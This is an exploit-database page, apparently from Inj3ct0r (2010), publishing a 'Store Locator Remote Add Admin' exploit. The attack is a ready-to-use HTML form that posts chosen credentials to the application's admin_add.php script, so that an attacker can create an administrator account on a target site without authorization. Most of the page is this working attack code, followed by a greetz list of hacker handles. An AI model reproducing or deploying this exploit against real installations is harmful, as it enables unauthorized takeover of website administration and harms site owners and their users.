Store Locator Remote Add Admin Exploit CSRF Vulnerability
Posted on 10 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Store Locator Remote Add Admin Exploit CSRF Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= Store Locator Remote Add Admin Exploit CSRF Vulnerability ========================================================= # vendor: www.ghostscripter.com ::::::::::::::[explo!t]::::::: ::::::: <html> <head> <title> Store Locator Remote Add Admin Exploit </title> </head> <body text="#00FF00" bgcolor="#000000"> <form action=http://server/StoreLocator/adm/admin_add.php method=post style="text-align: center"> <br> User: <input name="username" type="text" id="username" value="" /> <br> Pass: <input name="password" type="password" id="password" value="" /> <br> <input type="submit" name="Submit" value="Create Admin" /><br> &nbsp;<br> </p> </form> </body> <html> :::::::::::::::::::::::::::::::::::::::::: Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek AnD all Tunisian hacker :::::::::::::::::::S.W.T::::::::::::::::::::: # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
